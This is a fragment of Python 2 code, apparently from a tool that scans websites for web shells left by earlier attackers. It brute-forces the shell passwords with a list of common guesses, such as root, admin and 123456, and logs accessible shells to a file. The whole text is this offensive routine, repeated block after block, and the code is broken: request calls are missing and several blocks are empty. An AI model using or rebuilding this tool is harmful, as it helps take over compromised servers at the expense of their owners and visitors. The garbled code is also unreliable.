if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH13_J_content = requests.get(SH13_J,timeout=15).content
if ' type="file"' in SH13_J_content or ' type=\'file\'' in SH13_J_content or ' type= "file"' in SH13_J_content or ' type= \'file\'' in SH13_J_content or ' type = "file"' in SH13_J_content or ' type = \'file\'' in SH13_J_content or ' type ="file"' in SH13_J_content or ' type =\'file\'' in SH13_J_content or ' type=file' in SH13_J_content or ' type =file' in SH13_J_content or ' type= file' in SH13_J_content or ' type = file' in SH13_J_content or 'Upload</a> ]</li><li>[' in SH13_J_content or 'upload</a><li><a>Sym' in SH13_J_content :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH13_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH14_J_content = requests.get(SH14_J,timeout=15).content
if ' type="file"' in SH14_J_content or ' type=\'file\'' in SH14_J_content or ' type= "file"' in SH14_J_content or ' type= \'file\'' in SH14_J_content or ' type = "file"' in SH14_J_content or ' type = \'file\'' in SH14_J_content or ' type ="file"' in SH14_J_content or ' type =\'file\'' in SH14_J_content or ' type=file' in SH14_J_content or ' type =file' in SH14_J_content or ' type= file' in SH14_J_content or ' type = file' in SH14_J_content or 'Upload</a> ]</li><li>[' in SH14_J_content or 'upload</a><li><a>Sym' in SH14_J_content :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH14_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH15_J_content = requests.get(SH15_J,timeout=15).content
if ' type="file"' in SH15_J_content or ' type=\'file\'' in SH15_J_content or ' type= "file"' in SH15_J_content or ' type= \'file\'' in SH15_J_content or ' type = "file"' in SH15_J_content or ' type = \'file\'' in SH15_J_content or ' type ="file"' in SH15_J_content or ' type =\'file\'' in SH15_J_content or ' type=file' in SH15_J_content or ' type =file' in SH15_J_content or ' type= file' in SH15_J_content or ' type = file' in SH15_J_content or 'Upload</a> ]</li><li>[' in SH15_J_content or 'upload</a><li><a>Sym' in SH15_J_content :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH15_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH16_J_content = requests.get(SH16_J,timeout=15).content
if ' type="file"' in SH16_J_content or ' type=\'file\'' in SH16_J_content or ' type= "file"' in SH16_J_content or ' type= \'file\'' in SH16_J_content or ' type = "file"' in SH16_J_content or ' type = \'file\'' in SH16_J_content or ' type ="file"' in SH16_J_content or ' type =\'file\'' in SH16_J_content or ' type=file' in SH16_J_content or ' type =file' in SH16_J_content or ' type= file' in SH16_J_content or ' type = file' in SH16_J_content or 'Upload</a> ]</li><li>[' in SH16_J_content or 'upload</a><li><a>Sym' in SH16_J_content :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH16_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
